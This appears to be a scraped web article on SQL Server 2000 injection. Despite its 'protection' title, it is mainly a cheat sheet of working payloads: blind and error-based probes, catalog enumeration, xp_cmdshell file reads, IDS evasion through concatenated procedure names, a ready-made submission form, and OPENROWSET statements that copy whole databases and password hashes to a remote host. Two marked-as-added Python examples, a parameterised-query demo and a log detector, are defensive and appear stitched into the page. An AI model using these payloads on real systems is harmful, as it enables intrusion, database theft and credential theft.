SQL Server 2000 Injection Protection (2)

Source: Internet
Author: User


Traditional query structure:
select * from news where id=... and topic=... and ...
admin' and 1=(select count(*) from [user] where username='victime' and right(left(userpass,1),1)='1') and userpass<>'
select 123;--
; use master;--
a' or name like 'fff%';-- displays the user named ffff
' and 1<>(select count(email) from [user]);--
; update [users] set email=(select top 1 name from sysobjects where xtype='U' and status>0) where name='ffffff';--

Note:
The preceding statement fetches the name of the first user table in the database and writes it into the email field of the ffff user.
Viewing the ffff user's details then reveals that first table name, ad in this example.
Next, the table's ID is obtained from the table name ad:
ffff'; update [users] set email=(select top 1 id from sysobjects where xtype='U' and name='ad') where name='ffffff';--

With that ID the name of the second table can be read in the same way:
ffff'; update [users] set email=(select top 1 name from sysobjects where xtype='U' and id>581577110) where name='ffffff';--
ffff'; update [users] set email=(select top 1 count(id) from password) where name='ffffff';--
ffff'; update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--

ffff'; update [users] set email=(select top 1 name from password where id=2) where name='ffff';--

exec master..xp_servicecontrol 'start','schedule'
exec master..xp_servicecontrol 'start','server'
sp_addextendedproc 'xp_webserver','c:\temp\xp_foo.dll'

The newly registered extended stored procedure can then be called with:
exec xp_webserver

Once the extended stored procedure has been run, it can be removed again with:
sp_dropextendedproc 'xp_webserver'

insert into users values(666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--

insert into users values(667,123,123,0xffff)--

insert into users values(123,'admin''--','Password',0xffff)--

; and user>0
; and (select count(*) from sysobjects)>0
; and (select count(*) from msysobjects)>0 -- Access database

Introduction to injection:
(a) id=49: the injected parameter is numeric. The SQL statement looks roughly like this:
select * from table_name where field=49
The injected parameter is id=49 and [query condition], so the generated statement is:
select * from table_name where field=49 and [query condition]

(b) class=series: the injected parameter is a string. The SQL statement looks roughly like this:
select * from table_name where field='series'
The injected parameter is class=series' and [query condition] and ''=', so the generated statement is:
select * from table_name where field='series' and [query condition] and ''=''

(c) Search parameters that are not filtered, such as keyword=keyword. The original SQL statement looks roughly like this:
select * from table_name where field like '%keyword%'
The injected parameter is keyword=' and [query condition] and '%25'=', so the generated statement is:
select * from table_name where field like '%' and [query condition] and '%'='%'

; and (select top 1 name from sysobjects where xtype='U' and status>0)>0
sysobjects is a SQL Server system table that stores the names of all tables, views, constraints and other objects. xtype='U' and status>0 selects user-created tables; the statement above fetches the first such table name and compares it with 0, so the server's error message exposes the table name.

; and (select top 1 col_name(object_id('table_name'),1) from sysobjects)>0
With the table name obtained by the previous statement, object_id('table_name') returns the table's internal ID, and col_name(table ID, 1) returns the name of its first column. Replacing 1 with 2, 3, 4, ... returns the remaining column names of the table one by one.
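The three cases above differ only in how the request parameter is glued into the statement. The following Python example, added here and not part of the original article, builds each vulnerable statement by string concatenation exactly as cases (a), (b) and (c) describe, runs it against a small constructed table, and runs the parameterised equivalent beside it. SQLite stands in for SQL Server (an assumption, chosen so the example runs offline); the table news, its rows and the probe strings are constructed sample data.

```python
import sqlite3

# Constructed sample data standing in for the article's "table name" / "field".
# id is the numeric parameter of case (a), class the string of case (b),
# body the text searched with LIKE in case (c).
ROWS = [
    (49, "series", "keyword one"),
    (50, "other", "plain text"),
    (51, "series", "keyword two"),
]


def make_db():
    """SQLite in-memory database (assumption: stands in for SQL Server 2000)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table news (id integer, class text, body text)")
    conn.executemany("insert into news values (?, ?, ?)", ROWS)
    return conn


def unsafe_sql(kind, value):
    """Build the statement by concatenation, exactly as cases (a), (b), (c) do."""
    if kind == "numeric":
        return "select * from news where id = " + str(value)
    if kind == "string":
        return "select * from news where class = '" + str(value) + "'"
    if kind == "like":
        return "select * from news where body like '%" + str(value) + "%'"
    raise ValueError(kind)


def unsafe_rows(conn, kind, value):
    """Run the concatenated statement; the input is parsed as SQL."""
    return conn.execute(unsafe_sql(kind, value)).fetchall()


def safe_rows(conn, kind, value):
    """Parameterised equivalent; the driver sends the value separately as data."""
    if kind == "numeric":
        sql, params = "select * from news where id = ?", (value,)
    elif kind == "string":
        sql, params = "select * from news where class = ?", (value,)
    elif kind == "like":
        sql, params = "select * from news where body like ?", ("%" + str(value) + "%",)
    else:
        raise ValueError(kind)
    return conn.execute(sql, params).fetchall()


def demo():
    """Row counts for a true and a false probe in each case, unsafe versus parameterised."""
    conn = make_db()
    probes = {
        "numeric": ("49 and 1=1", "49 and 1=2"),
        "string":  ("series' and 1=1 and ''='", "series' and 1=2 and ''='"),
        "like":    ("' and 1=1 and '%'='", "' and 1=2 and '%'='"),
    }
    result = {}
    for kind, (true_probe, false_probe) in probes.items():
        result[kind] = {
            "unsafe_true":  len(unsafe_rows(conn, kind, true_probe)),
            "unsafe_false": len(unsafe_rows(conn, kind, false_probe)),
            "safe_true":    len(safe_rows(conn, kind, true_probe)),
            "safe_false":   len(safe_rows(conn, kind, false_probe)),
        }
    return result


if __name__ == "__main__":
    for kind, counts in demo().items():
        print(kind, counts, "|", unsafe_sql(kind, "..."))
```

In the concatenated form the row count follows the truth of the injected condition (1 row versus 0 for case (a), 2 versus 0 for (b), 3 versus 0 for (c)), which is exactly the signal the blind probes on this page rely on; in the parameterised form both probes return nothing, because the whole string is compared as a value and never parsed as SQL.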

Contents of post.htm, a simple form for submitting the payloads:

<iframe name=p src=# width=800 height=350 frameborder=0></iframe>
<br>
<form action=http://test.com/count.asp target=p>
<input name="id" value="1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='U' and status>0);--" style="width:750">
<input type=submit value=">>>">
<input type=hidden name=fno value="2,3">
</form>

Reading the table names of the target database:
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='U' and status>0);--

This writes the first table name into the aaa field.

Once the first table name is known, the second is read by appending and name<>'the table name just obtained' to the condition:
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='U' and status>0 and name<>'Vote');--

Then id=1552 and exists(select * from aaa where aaa>5)

Read the second table this way and continue one table at a time until no further table exists.

The columns are read as follows:
id=1552;update aaa set aaa=(select top 1 col_name(object_id('table_name'),1));--

Then id=1552 and exists(select * from aaa where aaa>5) raises an error that reveals the value.
id=1552;update aaa set aaa=(select top 1 col_name(object_id('table_name'),2));--
Then id=1552 and exists(select * from aaa where aaa>5) raises an error that reveals the value.

Advanced techniques:

[Retrieving table names] [update a field to the table name, then read that field back to get the table name]
update table_name set field=(select top 1 name from sysobjects where xtype='U' and status>0 [and name<>'table name already obtained'; add one per table found]) [where condition]
select top 1 name from sysobjects where xtype='U' and status>0 and name not in ('table1','table2',...)

Creating a database administrator account and a system administrator account through a SQL Server injection vulnerability [the current login must be a member of the sysadmin role]

[Retrieving the column names of a table] [update a field to the column name, then read that field back to get the column name]
update table_name set field=(select top 1 col_name(object_id('name of the table to query'), column number, e.g. 1)) [where condition]

Bypassing IDS detection [using variables]
declare @a sysname set @a='xp_'+'your shell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'

1. Connecting to a remote database
Basic syntax:
select * from OPENROWSET('sqloledb','server=servername;uid=sa;pwd=apachy_123','select * from table1')

Parameters: (1) the OLE DB provider name

2. The connection string can name the network library and any port used for the connection, for example:
select * from OPENROWSET('sqloledb','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select * from table')

To copy the whole database of the target host, first establish a connection from the target host to your database (how to open a remote connection from the target host was described above), then insert every remote table into a local table.

Basic syntax:
insert into OPENROWSET('sqloledb','server=servername;uid=sa;pwd=apachy_123','select * from table1') select * from table2

This statement copies all the data in table2 on the target host into table1 in the remote database. In practice, change the IP address and port in the connection string to point to the desired location, for example:
insert into OPENROWSET('sqloledb','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select * from table1') select * from table2

insert into OPENROWSET('sqloledb','uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;','select * from _sysdatabases')
select * from master.dbo.sysdatabases

insert into OPENROWSET('sqloledb','uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;','select * from _sysobjects')
select * from user_database.dbo.sysobjects

insert into OPENROWSET('sqloledb','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select * from _syscolumns')
select * from user_database.dbo.syscolumns

The target host's database structure can now be examined from the local database, after which copying the tables themselves is straightforward:
insert into OPENROWSET('sqloledb','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select * from table1') select * from database..table1

insert into OPENROWSET('sqloledb','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select * from table2') select * from database..table2

...

3. Copying the password hash table

This is an extension of copying the database: the hashes of the login passwords are stored in sysxlogins, so they are copied the same way:
insert into OPENROWSET('sqloledb','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select * from _sysxlogins') select * from database.dbo.sysxlogins

Once the hashes are obtained they can be brute-forced, which takes a good deal of luck and time.

Traversing a directory:
First create a temporary table, temp:
5'; create table temp(id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--
5'; insert temp exec master.dbo.xp_availablemedia;-- lists all current drives
5'; insert into temp(id) exec master.dbo.xp_subdirs 'C:\';-- lists the subdirectories
5'; insert into temp(id,num1) exec master.dbo.xp_dirtree 'C:\';-- returns the whole directory tree and imports it into the temp table

5'; insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- views the content of a file
5'; insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
5'; insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\*.asp /s';--
5'; insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc';--

5'; insert into temp(id,num1) exec master.dbo.xp_dirtree 'C:\';-- (xp_dirtree is executable by the PUBLIC role)
Checking which server roles the current login holds:
Statement 1: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
Statement 2: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
Statement 3: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
Statement 4: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
Statement 5: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
Statement 6: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
Statement 7: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_MEMBER('db_owner'));--
Writing directory paths to a table:
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(100), id int)--
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'C:\'--
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)--
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in ('@inetpub'))--
Statement: http://www.xxxxx.com/down/list.asp?id=1;create table dirs1(paths varchar(100), id int)--
Statement: http://www.xxxxx.com/down/list.asp?id=1;insert dirs1 exec master.dbo.xp_dirtree 'e:\web'--
Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)--
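The variable trick in the "Bypassing IDS detection" section, the char()-built strings in the insert statements earlier on the page, the OPENROWSET connections and the role-probe and xp_dirtree URLs just listed all defeat a detector that matches raw request strings. The following Python example, added here and not the article's own code, normalises a request's query string (URL decoding, folding char() calls and 'a'+'b' literal concatenation into plain literals) before matching signatures for the payload shapes this page uses, and runs it over a few constructed web-server log lines. The log format, the signature names, the client addresses and the placeholder password are assumptions.

```python
import re
from urllib.parse import unquote, unquote_plus

# Signatures for the payload shapes used on this page: stacked queries,
# trailing comments, catalog reads, extended procedures, ad hoc remote
# queries, role probes, dynamic exec and column-name probing.
SIGNATURES = {
    "stacked_query":  re.compile(r";\s*(?:exec|insert|update|create|declare|use)\b"),
    "comment_tail":   re.compile(r"--\s*$"),
    "system_catalog": re.compile(r"\b(?:sysobjects|syscolumns|sysxlogins|sysdatabases)\b"),
    "extended_proc":  re.compile(r"\bxp_\w+|\bsp_(?:add|drop)extendedproc\b"),
    "remote_query":   re.compile(r"\bopenrowset\s*\("),
    "role_probe":     re.compile(r"\bis_(?:srvrole)?member\s*\("),
    "dynamic_exec":   re.compile(r"\bexec\s+@\w+"),
    "metadata_probe": re.compile(r"\b(?:col_name|object_id)\s*\("),
}

_CHAR_CALL = re.compile(r"char\s*\(\s*(0x[0-9a-f]+|\d+)\s*\)")
_LITERAL_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def _char_to_literal(m):
    """char(0x63) -> 'c' so that char()-built strings become plain literals."""
    v = m.group(1)
    code = int(v, 16) if v.startswith("0x") else int(v)
    return "'" + chr(code) + "'"


def normalize(raw_query):
    """Undo the evasions shown on the page before signature matching.

    Expects the raw, still percent-encoded query string from the log, so a
    literal '+' in SQL must arrive as %2B (as it would on the wire).
    """
    s = unquote_plus(raw_query)   # %20 -> space, '+' -> space, %2B -> '+'
    s = unquote(s)                # second pass collapses double encoding (%2527)
    s = s.lower()
    s = _CHAR_CALL.sub(_char_to_literal, s)
    # Fold 'xp'+'_cm'+'dshell' (and the char() output above) into one literal.
    while True:
        folded = _LITERAL_CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
        if folded == s:
            break
        s = folded
    return re.sub(r"\s+", " ", s).strip()


def scan(raw_query):
    """Return (normalized text, list of matching signature names)."""
    norm = normalize(raw_query)
    return norm, [name for name, rx in SIGNATURES.items() if rx.search(norm)]


def scan_log(lines):
    """Scan 'client method path status' lines; path holds the percent-encoded query."""
    findings = []
    for n, line in enumerate(lines, 1):
        parts = line.split()
        if len(parts) < 4:
            continue
        client, _method, path, _status = parts[:4]
        norm, hits = scan(path)
        if hits:
            findings.append({"line": n, "client": client, "hits": hits, "normalized": norm})
    return findings


# Constructed sample log: one benign request, five shaped like this page's
# payloads, one benign double-encoded search. Addresses are private/documentation
# ranges and the password is a placeholder.
SAMPLE_LOG = """\
10.0.0.5 GET /down/list.asp?id=1552 200
10.0.0.9 GET /down/list.asp?id=1%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))-- 500
10.0.0.9 GET /down/list.asp?id=1;declare%20@a%20sysname%20set%20@a='xp'%2B'_cm'%2B'dshell'%20exec%20@a%20'dir'-- 200
10.0.0.9 GET /count.asp?id=1552;update%20aaa%20set%20aaa=(select%20top%201%20name%20from%20sysobjects%20where%20xtype='U'%20and%20status%3E0);-- 200
10.0.0.9 GET /count.asp?id=1;insert%20into%20users%20values(666,char(0x63)%2Bchar(0x68)%2Bchar(0x72),0xffff)-- 200
10.0.0.9 GET /down/list.asp?id=1;insert%20into%20OPENROWSET('sqloledb','uid=sa;pwd=PLACEHOLDER;Network=DBMSSOCN;Address=192.0.2.10,1433;','select%20*%20from%20t')%20select%20*%20from%20master.dbo.sysxlogins-- 200
10.0.0.12 GET /search.asp?keyword=apache%2520tuning 200
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f["line"], f["client"], ",".join(f["hits"]), "|", f["normalized"])
```

The point of the normalisation step is that the concatenated 'xp'+'_cm'+'dshell' and the char(0x63)+... sequences only become matchable after folding; a signature applied to the raw request sees neither xp_cmdshell nor the inserted username. The same normalised text is what should be logged with the alert, so an analyst sees the statement the database would actually have executed.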
